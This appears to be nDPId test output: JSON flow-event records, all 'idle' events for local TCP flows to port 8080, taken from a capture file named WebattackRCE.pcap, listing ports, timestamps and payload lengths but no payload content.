00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277586,"flow_last_seen":1576420277586,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50698,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277588,"flow_last_seen":1576420277588,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50700,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277590,"flow_last_seen":1576420277590,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50702,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277592,"flow_last_seen":1576420277592,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50704,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277593,"flow_last_seen":1576420277593,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50706,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277595,"flow_last_seen":1576420277595,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50708,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277597,"flow_last_seen":1576420277597,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50710,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277598,"flow_last_seen":1576420277598,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50712,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277600,"flow_last_seen":1576420277600,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277602,"flow_last_seen":1576420277602,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50716,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277604,"flow_last_seen":1576420277604,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50718,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277607,"flow_last_seen":1576420277607,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50720,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277608,"flow_last_seen":1576420277608,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50722,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277609,"flow_last_seen":1576420277609,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50724,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277611,"flow_last_seen":1576420277611,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50726,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277612,"flow_last_seen":1576420277612,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50728,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277614,"flow_last_seen":1576420277614,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50730,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277615,"flow_last_seen":1576420277615,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50732,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277616,"flow_last_seen":1576420277616,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50734,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277618,"flow_last_seen":1576420277618,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50736,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277619,"flow_last_seen":1576420277619,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50738,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277622,"flow_last_seen":1576420277622,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50740,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277624,"flow_last_seen":1576420277624,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50742,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277625,"flow_last_seen":1576420277625,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50744,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277627,"flow_last_seen":1576420277627,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50746,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277628,"flow_last_seen":1576420277628,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50748,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277630,"flow_last_seen":1576420277630,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50750,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277631,"flow_last_seen":1576420277631,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50752,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277633,"flow_last_seen":1576420277633,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50754,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277637,"flow_last_seen":1576420277637,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50756,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277639,"flow_last_seen":1576420277639,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50758,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277642,"flow_last_seen":1576420277642,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50760,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277644,"flow_last_seen":1576420277644,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50762,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277646,"flow_last_seen":1576420277646,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50764,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277648,"flow_last_seen":1576420277648,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50766,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277650,"flow_last_seen":1576420277650,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50768,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277657,"flow_last_seen":1576420277657,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50770,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277658,"flow_last_seen":1576420277658,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50772,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277660,"flow_last_seen":1576420277660,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50774,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277662,"flow_last_seen":1576420277662,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50776,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277663,"flow_last_seen":1576420277663,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50778,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277667,"flow_last_seen":1576420277667,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50780,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277669,"flow_last_seen":1576420277669,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50782,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277670,"flow_last_seen":1576420277670,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50784,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277675,"flow_last_seen":1576420277675,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50786,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277677,"flow_last_seen":1576420277677,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50788,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277678,"flow_last_seen":1576420277678,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50790,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
